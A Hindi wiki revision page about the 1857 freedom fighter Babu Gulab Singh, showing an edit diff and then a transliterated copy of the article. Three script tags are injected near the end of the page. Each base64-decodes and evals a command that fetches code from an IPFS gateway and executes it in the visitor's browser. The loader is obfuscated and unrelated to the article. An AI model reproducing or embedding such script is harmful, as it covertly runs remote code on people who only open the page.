Difference between revisions of "बाबू गुलाब सिंह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " नही " to " नहीं ")
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
'''शहीद बाबू  गुलाब सिंह''' (मृत्यु:[[1857]]) एक स्वतंत्रता सेनानी,क्रांतिकारी थे।इनका जन्म [[उत्तर प्रदेश]] के [[इलाहाबाद ज़िला|इलाहाबाद जनपद]] के तारागढ़ (अब तरौल नाम है जो की प्रतापगढ़ जिला में है) गाँव में हुआ था।
+
'''शहीद बाबू  गुलाब सिंह''' (मृत्यु:[[1857]]) एक स्वतंत्रता सेनानी थे।इनका जन्म [[उत्तर प्रदेश]] के [[इलाहाबाद ज़िला|इलाहाबाद जनपद]] के तारागढ़ (अब तरौल नाम है जो की [[प्रतापगढ़ ज़िला]] में है) गाँव में हुआ था।
 
+
*ठाकुर गुलाब सिंह [[नाना साहब|नाना साहेब पेशवा]] तथा [[झांसी की रानी लक्ष्मीबाई]] के व्यक्तित्व से काफ़ी प्रभावित थे।  
*ठाकुर गुलाब सिंह [[नाना साहब|नाना साहेब पेशवा]] तथा [[झांसी की रानी लक्ष्मीबाई]] के व्यक्तित्वा से काफी प्रभावित थे।  
+
* सन [[1857 का स्वतंत्रता संग्राम]] में अंग्रेजी सेना छितपालगढ़ से तारागढ़ पर चढ़ाई की तो बाबू गुलाब सिंह व उनके भाई [[बाबू मेदनी सिंह]] ने हफ्तों तक [[अंग्रेज़|अंग्रेजों]] से लोहा लिया। हालाकि उन्हें मालूम था कि अंग्रेजी सेना के सामने लड़ना मौत के मुँह मे जाना है, फिर भी [[भारत]] के सपूतों ने अंतिम समय तक [[किला|किले]] के समीप अंग्रेजी सेना को फटकने नहीं दिया। जब [[इलाहाबाद]] से [[लखनऊ]] अंग्रेजी सैनिक क्रांतिकारियों के दमन के लिए जा रहे थे। तब उन्होंने अपनी निजी सेना के साथ मान्धाता क्षेत्र के [[कटरा गुलाब सिंह]] के पास [[बकुलाही नदी]] पर घमासान युद्ध करके कई अंग्रेजों को मार डाला था।  
 
 
* सन [[1857 का स्वतंत्रता संग्राम]] में अंग्रेजी सेना छितपालगढ़ से तारागढ़ पर चढ़ाई की तो बाबू गुलाब सिंह व उनके भाई बाबू मेदनी सिंह ने हफ्तों तक [[अंग्रेज़|अंग्रेजों]] से लोहा लिया।
 
 
 
* हालाकि उन्हें मालूम था कि अंग्रेजी सेना के सामने लड़ना मौत के मुँह मे जाना है,फिर भी भारत के सपूतों ने अंतिम समय तक [[किला|किले]] के समीप अंग्रेजी सेना को फटकने नही दिया। जब [[इलाहाबाद]] से [[लखनऊ]] अंग्रेजी सैनिक क्रांतिकारियों के दमन के लिए जा रहे थे। तब उन्होंने अपनी निजी सेना के साथ मान्धाता क्षेत्र के [[कटरा गुलाब सिंह]] के पास [[बकुलाही नदी]] पर घमासान युद्ध करके कई अंग्रेजों को मार डाला था।  
 
 
 
 
* जानकारी के अनुसार  इस लड़ाई में किले पर फिरंगी सैनिकों ने उनके कई सिपाही व उनकी महारानी को गोलियों से भून डाला था। मुठभेड़ में बाबू गुलाब सिंह गंभीर रूप से घायल हुए थे। उचित इलाज के अभाव में तीसरे दिन वह अमर गति को प्राप्त हो गए।
 
* जानकारी के अनुसार  इस लड़ाई में किले पर फिरंगी सैनिकों ने उनके कई सिपाही व उनकी महारानी को गोलियों से भून डाला था। मुठभेड़ में बाबू गुलाब सिंह गंभीर रूप से घायल हुए थे। उचित इलाज के अभाव में तीसरे दिन वह अमर गति को प्राप्त हो गए।
 +
* क्रांतिकारी बाबू गुलाब सिंह ने पौराणिक नदी [[बकुलाही नदी|बकुलाही]] के किनारे एक गाँव की स्थापना की थी, जो वर्तमान में उन्हीं के नाम पर '''[[कटरा गुलाब सिंह]]''' के नाम से जाना जाता है।
  
* क्रांतिकारी बाबू गुलाब सिंह ने पौराणिक नदी [[बकुलाही नदी|बकुलाही]] के किनारे एक गाँव की स्थापना की थी,जो की वर्तमान में उन्हीं के नाम पर '''[[कटरा गुलाब सिंह]]''' के नाम से जाना जाता है।
 
  
{{प्रचार}}
 
 
{{लेख प्रगति |आधार= |प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति |आधार= |प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{स्वतन्त्रता सेनानी}}
 
{{स्वतन्त्रता सेनानी}}
  
 +
[[Category:स्वतन्त्रता सेनानी]]
 +
[[Category:इतिहास कोश]]
 
__INDEX__
 
__INDEX__
 
[[Category:स्वतन्त्रता सेनानी]]1857 का स्वतंत्रता संग्राम
 
 
[[Category:इतिहास कोश]]
 

Revision as of 12:48, 2 September 2013

shahid baboo gulab sianh (mrityu:1857) ek svatantrata senani the.inaka janm uttar pradesh ke ilahabad janapad ke taragadh (ab taraul nam hai jo ki pratapagadh zila mean hai) gaanv mean hua tha.

  • thakur gulab sianh nana saheb peshava tatha jhaansi ki rani lakshmibaee ke vyaktitv se kafi prabhavit the.
  • san 1857 ka svatantrata sangram mean aangreji sena chhitapalagadh se taragadh par chadhaee ki to baboo gulab sianh v unake bhaee baboo medani sianh ne haphtoan tak aangrejoan se loha liya. halaki unhean maloom tha ki aangreji sena ke samane l dana maut ke muanh me jana hai, phir bhi bharat ke sapootoan ne aantim samay tak kile ke samip aangreji sena ko phatakane nahian diya. jab ilahabad se lakhanoo aangreji sainik kraantikariyoan ke daman ke lie ja rahe the. tab unhoanne apani niji sena ke sath mandhata kshetr ke katara gulab sianh ke pas bakulahi nadi par ghamasan yuddh karake kee aangrejoan ko mar dala tha.
  • janakari ke anusar is l daee mean kile par phirangi sainikoan ne unake kee sipahi v unaki maharani ko goliyoan se bhoon dala tha. muthabhe d mean baboo gulab sianh ganbhir roop se ghayal hue the. uchit ilaj ke abhav mean tisare din vah amar gati ko prapt ho ge.
  • kraantikari baboo gulab sianh ne pauranik nadi bakulahi ke kinare ek gaanv ki sthapana ki thi, jo vartaman mean unhian ke nam par katara gulab sianh ke nam se jana jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>